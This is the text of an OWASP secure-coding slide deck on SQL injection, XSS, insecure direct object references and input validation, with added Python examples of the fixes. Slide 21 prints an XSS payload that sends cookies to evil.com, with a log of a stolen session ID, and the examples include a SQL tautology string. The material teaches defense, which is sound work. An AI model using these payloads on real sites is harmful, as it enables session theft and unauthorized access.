SecureYourApp
OWASP-Turkey
Bünyamin Demir
Bünyamin Demir ( @bunyamindemir )
– BSc, Kocaeli University, Department of Mathematics
– MSc, Kocaeli University, Natural and Applied Sciences; thesis: Oracle Database Security
– Application Developer
– OWASP Turkey Chapter Leader
– Penetration Testing Specialist
• Web, Mobile, Network, SCADA, Wireless, Social Engineering, ATM, DoS/DDoS and Load testing
• Source code analysis
– Trainer
• Web/Mobile Application Security Auditing
• Secure Code Development
• Database Security
2
3
OWASP
4
Why is OWASP Special?
• OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide
5
OWASP Projects
6
OWASP ZAP Proxy / WebScarab
7
Application Security Verification Standard
Application Security
8
Attacker vs. Defender (figure from slide 8): two weeks of ethical hacking against ten man-years of development; the flaw classes shown are business logic flaws, code flaws and security errors.
9
Web Application Threat Surface
10
11
OWASP TOP 10
A1 - Injection
12
Anatomy of SQL Injection Attack
13
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password = 'password'
Anatomy of SQL Injection Attack
14
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password =
causes all rows in the users table to be returned!
Bind Parameters (PHP)
15
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
Parametrized Query (.NET)
16
SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name", NameTextBox.Text);
objCommand.Parameters.Add("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();
Prepare Statement (Java)
17
String newName = request.getParameter("newName");
String id = request.getParameter("id");
// SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
// HQL
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
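The dynamic SQL from slides 13 and 14 and the bind-parameter fix from slides 15 to 17, as an added Python example that is not from the slides: it runs both forms of the login query against an in-memory SQLite table with constructed rows. The table name `user_table` is the slides'; the `login_*` function names and the tautology value are this example's own.

```python
import sqlite3

# Added example (not from the slides): the dynamic-SQL login of slides 13-14
# rebuilt on an in-memory SQLite database, beside the parameterized form that
# the PHP/.NET/Java slides recommend. Table contents are constructed.


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_table (username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO user_table VALUES (?, ?)",
        [("john", "password"), ("alice", "s3cret")],  # constructed rows
    )
    return con


def login_dynamic_sql(con, username, password):
    # Same construction as slide 13: untrusted input is spliced into the
    # statement text, so the input can change the statement's structure.
    sql = ("SELECT * FROM user_table WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchall()


def login_parameterized(con, username, password):
    # Statement text is fixed; values travel separately as bind parameters,
    # so a quote in the input is just a character inside the value.
    sql = "SELECT * FROM user_table WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    con = make_db()
    # Constructed tautology value of the kind slide 14 describes.
    tautology = "x' OR '1'='1"
    print(login_dynamic_sql(con, "john", "password"))   # the one row the developer intended
    print(login_dynamic_sql(con, "john", tautology))    # every row: the WHERE clause was restructured
    print(login_parameterized(con, "john", tautology))  # []: the value is compared literally
```

The detection angle is in the second call: with dynamic SQL the statement text itself differs per request, so a database-side query log shows a new statement shape for the tautology input, whereas the parameterized version always logs the same prepared text.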
A3 - XSS
18
A3 - XSS
19
Anatomy of XSS Attack
20
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
Anatomy of XSS Attack
21
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5
HTTP/1.1" 200 7425 "http://www.davshan.loc/....
OWASP Java Encoder Project
22
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<%-- JavaScript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- JavaScript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
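click">
An added example, not part of the slides or of the OWASP Java Encoder project: Python equivalents of the per-context encoders from slide 22, applied to the probe string from slide 20. The `encode_for_*` function names and the `render_*` helpers are this example's own.

```python
import html
import re
from urllib.parse import quote

# Added example (not from the slides, not the Java Encoder's code): one output
# encoder per context of slide 22. Which encoder is right depends on where the
# value lands in the page, which is the point the JSP slide makes.

UNTRUSTED = "<script>alert(1);</script>"  # constructed: the probe from slide 20


def encode_for_html(value):
    # HTML body context: the metacharacters become entities, so the browser
    # shows the text instead of parsing it as markup.
    return html.escape(value, quote=True)


def encode_for_html_attribute(value):
    # Quoted attribute context: same entity set; the quotes are what would
    # otherwise let input break out of value="...".
    return html.escape(value, quote=True)


def encode_for_javascript(value):
    # JavaScript string context (cf. Encode.forJavaScriptBlock): hex-escape every
    # character outside [A-Za-z0-9], so neither a quote nor "</script>" can end
    # the string literal or the enclosing script block.
    def esc(match):
        code = ord(match.group(0))
        if code < 0x100:
            return "\\x%02x" % code
        if code <= 0xFFFF:
            return "\\u%04x" % code
        code -= 0x10000  # outside the BMP: emit a UTF-16 surrogate pair
        return "\\u%04x\\u%04x" % (0xD800 + (code >> 10), 0xDC00 + (code & 0x3FF))
    return re.sub(r"[^A-Za-z0-9]", esc, value)


def encode_for_url(value):
    # URL path or query component: percent-encode everything, including "/".
    return quote(value, safe="")


def render_search_result(term, count):
    # The friends.php response of slide 20, with the echoed term encoded.
    return "<p>Result for <b>%s</b> :%d</p>" % (encode_for_html(term), count)


def render_profile_link(user_id):
    # The profile link of slide 25, built server-side with URL encoding.
    return '<a href="/profile/%s">Link</a>' % encode_for_url(user_id)


def render_script_block(msg):
    # The JavaScript block context of slide 22.
    return '<script>var msg = "%s"; alert(msg);</script>' % encode_for_javascript(msg)
```

Using `encode_for_html` inside a `<script>` string, or `encode_for_javascript` inside an attribute, leaves the other context's metacharacters untouched; picking the encoder by destination context is what makes the slide 22 pattern work.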
Rich Text
23
OWASP HTML Sanitizer Project
24
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();
String safeHTML = policy.sanitize(untrustedHTML);
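An added example, not the OWASP HTML Sanitizer's code: a small allowlist sanitizer on Python's standard-library HTMLParser that enforces the same policy as the builder above (only `<a>`, only `href`, only `https:` URLs, `rel="nofollow"` added to links). The class and function names are this example's own; relative URLs are dropped here, which is one reading of `allowUrlProtocols("https")`, not necessarily the library's.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Added example (not from the slides, not the OWASP HTML Sanitizer): an allowlist
# sanitizer for rich text. Everything not explicitly allowed is dropped; text
# content is kept but entity-encoded, so it can never become markup.

ALLOWED_ELEMENTS = {"a"}
ALLOWED_ATTRS = {"a": {"href"}}
ALLOWED_URL_SCHEMES = {"https"}


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []  # tags actually emitted, so only those get closed

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_ELEMENTS:
            return  # element dropped; its text still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS[tag] or value is None:
                continue  # event handlers, style, etc. never pass
            if name == "href" and urlsplit(value.strip()).scheme not in ALLOWED_URL_SCHEMES:
                continue  # javascript:, data:, http: and relative URLs are dropped
            kept.append((name, value))
        if tag == "a":
            kept.append(("rel", "nofollow"))  # requireRelNofollowOnLinks()
        attr_text = "".join(' %s="%s"' % (n, html.escape(v, quote=True)) for n, v in kept)
        self.out.append("<%s%s>" % (tag, attr_text))
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            while self.open_tags:  # close anything left open inside it as well
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        # Text (including the body of a dropped <script>) is encoded, not executed.
        self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:  # balance tags the input left unclosed
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(untrusted_html):
    parser = AllowlistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return parser.result()
```

Comments are discarded by HTMLParser's default `handle_comment`, which is the safe default for this policy; a sanitizer that preserved them would need its own encoding rule for comment text.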
JQuery.Encoder
25
…
$(function() {
  $("div[name=" + $.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1))) + "]");
});
…
Other encoders: encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS
$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
A4 – Insecure Direct Object References
26
• Attacker notices his acct parameter is 6065: ?acct=6065
• He modifies it to a nearby number: ?acct=6066
• Attacker views the victim's account information
https://www.onlinebank.com/user?acct=6065
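An added example, not from the slides: the account lookup behind `?acct=6065` written with an ownership check, plus an indirect reference map so the real account number is never exposed to the client. The account table, user names, `Forbidden` exception and function names are constructed for this example.

```python
# Added example (not from the slides): fixing the insecure direct object
# reference of slide 26. The records and owners below are constructed.

ACCOUNTS = {
    6065: {"owner": "alice", "balance": 120.0},
    6066: {"owner": "bob", "balance": 980.0},
}


class Forbidden(Exception):
    """Raised when the session user does not own the requested object."""


def get_account_direct(session_user, acct):
    # Keep accepting ?acct=NNNN, but check ownership before returning anything.
    # "Unknown" and "not yours" get the same answer, so the response does not
    # reveal which account numbers exist.
    record = ACCOUNTS.get(acct)
    if record is None or record["owner"] != session_user:
        raise Forbidden("account %r is not available to %s" % (acct, session_user))
    return record


def build_reference_map(session_user):
    # Indirect references: per-session indexes 1..n over the user's own accounts.
    owned = sorted(a for a, r in ACCOUNTS.items() if r["owner"] == session_user)
    return {i + 1: a for i, a in enumerate(owned)}


def get_account_indirect(session_user, ref_map, index):
    # ?acct=1 now resolves only through the map built for this session, so a
    # neighbouring number cannot name another user's account at all.
    acct = ref_map.get(index)
    if acct is None:
        raise Forbidden("no such reference %r for %s" % (index, session_user))
    return get_account_direct(session_user, acct)


def handle_request(session_user, query):
    # Parse the ?acct=NNNN query of slide 26 and answer with an HTTP-style status.
    try:
        acct = int(query.get("acct", ""))
    except ValueError:
        return 400, None
    try:
        return 200, get_account_direct(session_user, acct)
    except Forbidden:
        return 403, None


def is_forbidden(fn, *args):
    # Helper for callers that only need to know whether access was denied.
    try:
        fn(*args)
        return False
    except Forbidden:
        return True
```

A burst of 403 responses from one session walking adjacent `acct` values is also the log signature to alert on; the check is what turns the slide's scenario into a logged failure instead of a data leak.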
Best way to SecureYourApp
27
Input Validation
Input Validation - Java
28
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public boolean validateUsername(String username) {
    // Allowlist: exactly 6 to 12 ASCII letters or digits, nothing else
    String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
    if (username == null) {
        return false;
    }
    Pattern p = Pattern.compile(usernamePattern);
    Matcher m = p.matcher(username);
    if (!m.matches()) {
        return false;
    }
    return true;
}

if (!validateUsername(username)) {
    // invalid username
}
Input Validation - .NET
29
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.\s]{1,10}$"))
{
    // class name is not valid
}
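An added example, not from the slides: the two allowlist checks of slides 28 and 29 in Python, including the edge case that `$` alone hides in Python and .NET, where it also matches just before a trailing newline (Java's `matches()` requires the whole input to match, so the slide 28 code is not affected). The pattern constants and function names are this example's own.

```python
import re

# Added example (not from the slides): allowlist input validation with
# whole-string anchoring. fullmatch() succeeds only if the entire input is
# covered by the pattern, which is what an allowlist check has to mean.

USERNAME_PATTERN = re.compile(r"[a-zA-Z0-9]{6,12}")      # slide 28
CLASS_NAME_PATTERN = re.compile(r"[a-zA-Z0-9.\s]{1,10}")  # slide 29


def validate_username(username):
    # Same rule as slide 28: exactly 6-12 ASCII letters or digits.
    if username is None:
        return False
    return USERNAME_PATTERN.fullmatch(username) is not None


def validate_class_name(name):
    # Same rule as slide 29: 1-10 letters, digits, periods or whitespace.
    if name is None:
        return False
    return CLASS_NAME_PATTERN.fullmatch(name) is not None


def dollar_anchored_check(value):
    # The "^...$" form of the slides written with re.match: "$" also matches
    # before a final newline, so "abcdef\n" passes here but not in fullmatch.
    return re.match(r"^[a-zA-Z0-9]{6,12}$", value) is not None
```

A trailing newline that survives validation is rarely harmful on its own, but it shows that "the regex matched" and "the whole value is in the allowlist" are different statements; `fullmatch` (or `\A...\z` in .NET) makes them the same.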
30